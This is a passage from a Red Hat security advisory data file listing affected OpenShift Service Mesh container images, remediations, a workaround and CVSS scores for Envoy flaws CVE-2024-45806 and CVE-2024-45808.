"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45806", }, { category: "external", summary: "RHBZ#2313683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313683", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45806", url: "https://www.cve.org/CVERecord?id=CVE-2024-45806", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45806", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45806", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf", }, ], release_date: "2024-09-20T00:15:02.293000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "This flaw can be mitigated by configuring envoy to treat all IPs as external. This is done by setting the internal_address_config range for envoy to `0.0.0.0/32`.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Potential to manipulate `x-envoy` headers from external sources", }, { cve: "CVE-2024-45808", cwe: { id: "CWE-117", name: "Improper Output Neutralization for Logs", }, discovery_date: "2024-09-20T00:40:26.266584+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2313685", }, ], notes: [ { category: "description", text: "A flaw was found in envoy. Affected versions of envoy may allow malicious attackers to inject unexpected content into access logs. This is achieved by exploiting the lack of validation for the `REQUESTED_SERVER_NAME` field for access loggers.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Malicious log injection via access logs", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability in Envoy that allows attackers to inject unexpected content into access logs is classified as moderate severity rather than important because the impact is primarily related to log integrity rather than direct exploitation of the system or data breaches, which lowers the overall risk profile. While log tampering can lead to misleading information, it does not directly compromise the application’s functionality or security boundaries. Additionally, the attack requires specific conditions to succeed, relying on the lack of validation for the `REQUESTED_SERVER_NAME` field, which may not be present in all configurations.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score 